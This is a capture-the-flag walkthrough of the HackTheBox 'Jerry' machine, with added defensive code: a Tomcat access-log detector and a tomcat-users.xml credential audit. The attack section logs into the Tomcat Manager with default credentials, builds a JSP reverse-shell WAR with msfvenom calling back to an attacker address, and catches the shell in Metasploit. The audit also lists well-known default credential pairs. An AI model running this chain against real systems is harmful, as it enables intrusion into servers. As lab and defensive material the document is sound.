
Jerry (HackTheBox) penetration test notes

☕ 3 minutes · ✍️ IceKam

Introduction

After several days in a row of VulnHub practice I'm a bit worn out, so let's play with HackTheBox instead. The environments on that site are actually quite hard; the foreigners' way of thinking is as strange as ever.

Environment

Name: Jerry
IP: 10.10.10.95
Operating system: Windows Server 2012

Information gathering

$ nmap 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 19:28 CST
Nmap scan report for 10.10.10.95
Host is up (0.35s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 21.28 seconds

Vulnerability analysis

  • Port 8080 is open; opening it shows Tomcat's default page.
  • A quick look shows the default account and password still work; log in at http://10.10.10.95:8080/manager/html
  • From there a WAR file can be uploaded to obtain a shell, or msf can be used for a reverse shell.

Exploitation

Generate the reverse shell

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.11.6 LPORT=8144 -f war > icekam.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

Upload the shell

Upload it at: http://10.10.10.95:8080/manager/html

Listen for the shell

For time reasons I chose msf to listen for the shell; it is a bit faster.

msf exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 10.10.11.6
LHOST => 10.10.11.6
msf exploit(multi/handler) > set LPORT 8144
LPORT => 8144
msf exploit(multi/handler) > run

Get the shell

Open the uploaded payload from the manager page and the reverse shell connects.

[*] Started reverse TCP handler on 10.10.11.6:8144
[*] Command shell session 1 opened (10.10.11.6:8144 -> 10.10.10.95:50289) at 2018-11-03 19:02:20 +0800
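From the defender's side, the session above leaves a clear trace in Tomcat's access log: an authenticated request to a Manager deploy endpoint, followed shortly by the first request to a brand-new context path. The following detector is an added example for this write-up (not code from the original post or from Apache Tomcat); it assumes the default AccessLogValve pattern and runs over constructed log lines that mirror the post's session.

```python
import re

# Tomcat's default AccessLogValve pattern is: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that create or replace a web application (HTML and text managers).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/html/deploy", "/manager/text/deploy")
# Contexts expected on this host; anything else a deployer touches first is new.
KNOWN_CONTEXTS = {"/", "/manager", "/host-manager", "/docs", "/examples"}

def detect_manager_deploys(lines):
    """Return alert strings for Manager deployments and for the first request the
    deploying client then makes to a context outside KNOWN_CONTEXTS."""
    alerts, deployers = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, status = m["ip"], m["method"], m["status"]
        base = m["path"].split("?", 1)[0]
        is_deploy = base.startswith(DEPLOY_PATHS) or (method == "PUT" and base.startswith("/manager/"))
        if is_deploy and status[0] in "23":
            alerts.append(f"{m['ts']} {ip} deployed via {method} {base} as user {m['user']}")
            deployers.add(ip)
        elif ip in deployers:
            context = "/" + base.strip("/").split("/", 1)[0]
            if context not in KNOWN_CONTEXTS:
                alerts.append(f"{m['ts']} {ip} first request to new context {context} (HTTP {status})")
                deployers.discard(ip)  # report once per deployment
    return alerts

# Constructed sample log mirroring the session in the write-up (the CSRF nonce is redacted).
SAMPLE_LOG = [
    '10.10.11.6 - - [03/Nov/2018:19:00:01 +0800] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.11.6 - tomcat [03/Nov/2018:19:00:05 +0800] "GET /manager/html HTTP/1.1" 200 11582',
    '10.10.11.6 - tomcat [03/Nov/2018:19:01:40 +0800] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=REDACTED HTTP/1.1" 303 -',
    '10.10.11.6 - tomcat [03/Nov/2018:19:01:41 +0800] "GET /manager/html/list HTTP/1.1" 200 12004',
    '10.10.11.6 - - [03/Nov/2018:19:02:20 +0800] "GET /icekam/ HTTP/1.1" 200 -',
    '10.10.10.20 - - [03/Nov/2018:19:05:00 +0800] "GET /docs/ HTTP/1.1" 200 5322',
]

if __name__ == "__main__":
    for alert in detect_manager_deploys(SAMPLE_LOG):
        print(alert)
```

The 401 on /manager/html before the successful login is worth counting per source address too, since repeated 401s on that path are the signature of a credential-guessing attempt against the Manager.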

Find the flag

Found the flag by searching; it is on the user's Desktop, so we go there.

C:\apache-tomcat-7.0.88>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\apache-tomcat-7.0.88

06/19/2018  03:07 AM    <DIR>          .
06/19/2018  03:07 AM    <DIR>          ..
06/19/2018  03:06 AM    <DIR>          bin
06/19/2018  05:47 AM    <DIR>          conf
06/19/2018  03:06 AM    <DIR>          lib
05/07/2018  01:10 PM            57,896 LICENSE
11/03/2018  03:52 PM    <DIR>          logs
05/07/2018  01:10 PM             1,275 NOTICE
05/07/2018  01:10 PM             9,600 RELEASE-NOTES
05/07/2018  01:10 PM            17,454 RUNNING.txt
11/03/2018  08:01 PM    <DIR>          temp
11/03/2018  07:58 PM    <DIR>          webapps
06/19/2018  03:34 AM    <DIR>          work
               4 File(s)         86,225 bytes
               9 Dir(s)  29,325,012,992 bytes free

C:\apache-tomcat-7.0.88>cd c:/
cd c:/

c:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\

06/19/2018  03:07 AM    <DIR>          apache-tomcat-7.0.88
08/22/2013  05:52 PM    <DIR>          PerfLogs
06/19/2018  05:42 PM    <DIR>          Program Files
06/19/2018  05:42 PM    <DIR>          Program Files (x86)
11/03/2018  06:23 PM    <DIR>          Users
06/19/2018  05:54 PM    <DIR>          windows
               0 File(s)              0 bytes
               6 Dir(s)  29,325,012,992 bytes free

c:\>cd Users
cd Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users

11/03/2018  06:23 PM    <DIR>          .
11/03/2018  06:23 PM    <DIR>          ..
06/18/2018  10:31 PM    <DIR>          Administrator
11/03/2018  06:23 PM    <DIR>          config
08/22/2013  05:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  29,325,012,992 bytes free

c:\Users>cd Administrator
cd Administrator

c:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator

06/18/2018  10:31 PM    <DIR>          .
06/18/2018  10:31 PM    <DIR>          ..
06/19/2018  05:43 AM    <DIR>          Contacts
11/03/2018  06:02 PM    <DIR>          Desktop
06/19/2018  05:43 AM    <DIR>          Documents
06/19/2018  05:43 AM    <DIR>          Downloads
06/19/2018  05:43 AM    <DIR>          Favorites
06/19/2018  05:43 AM    <DIR>          Links
06/19/2018  05:43 AM    <DIR>          Music
06/19/2018  05:43 AM    <DIR>          Pictures
06/19/2018  05:43 AM    <DIR>          Saved Games
06/19/2018  05:43 AM    <DIR>          Searches
06/19/2018  05:43 AM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  29,324,881,920 bytes free

c:\Users\Administrator>cd Desktop
cd Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop

11/03/2018  06:02 PM    <DIR>          .
11/03/2018  06:02 PM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)  29,324,881,920 bytes free

c:\Users\Administrator\Desktop>cd flags
cd flags

c:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  29,324,881,920 bytes free

c:\Users\Administrator\Desktop\flags>cat 1.txt
cat 1.txt
  • Hmm, Linux habits are a problem here.

Get the flag

c:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
(flag1 obtained)

root.txt
(flag2 obtained)

Thoughts

This one was fairly easy; it mainly comes down to Tomcat's permission configuration.
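The configuration problem the box illustrates lives in tomcat-users.xml: an account holding a manager role with credentials that ship as examples in Tomcat's own config comments. The audit below is an added example for this write-up (not code from the original post or from Apache Tomcat); the weak/hardened configs and the hardened password are constructed, and the banned-credential list is a starting point to extend.

```python
import xml.etree.ElementTree as ET

# Username/password pairs that appear as examples in Tomcat's shipped tomcat-users.xml
# or are commonly left in place; extend with your organisation's own banned list.
KNOWN_WEAK_CREDENTIALS = {
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", "tomcat"), ("role1", "tomcat"), ("both", "tomcat"),
}
# Roles that allow deploying or administering applications through the Manager.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}

def audit_tomcat_users(xml_text: str) -> list[str]:
    """Return human-readable findings for manager accounts with weak credentials."""
    findings = []
    root = ET.fromstring(xml_text)
    # tomcat-users.xml may or may not declare the default namespace; handle both.
    for user in root.iter():
        if user.tag.split("}")[-1] != "user":
            continue
        name = user.get("username") or user.get("name") or ""
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        privileged = roles & MANAGER_ROLES
        if not privileged:
            continue  # unprivileged accounts cannot deploy; out of scope here
        if (name, password) in KNOWN_WEAK_CREDENTIALS:
            findings.append(f"{name}: well-known credentials with roles {sorted(privileged)}")
        elif len(password) < 12:
            findings.append(f"{name}: short password ({len(password)} chars) with roles {sorted(privileged)}")
    return findings

# Constructed: the kind of config that leaves the Manager open, and a hardened counterpart.
WEAK_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
</tomcat-users>"""

HARDENED_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="deployer" password="Lx9#vQ2p!mRz7wT4" roles="manager-gui"/>
</tomcat-users>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_tomcat_users(cfg) or ["no findings"])
```

If Tomcat is configured with a CredentialHandler the password attribute holds a digest and the length heuristic no longer applies. Whatever the credential strength, the Manager application should additionally be limited to the deploying hosts with a RemoteAddrValve in its context.xml.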

Author: IceKam. Tea-tasting "expert", low-end word pusher.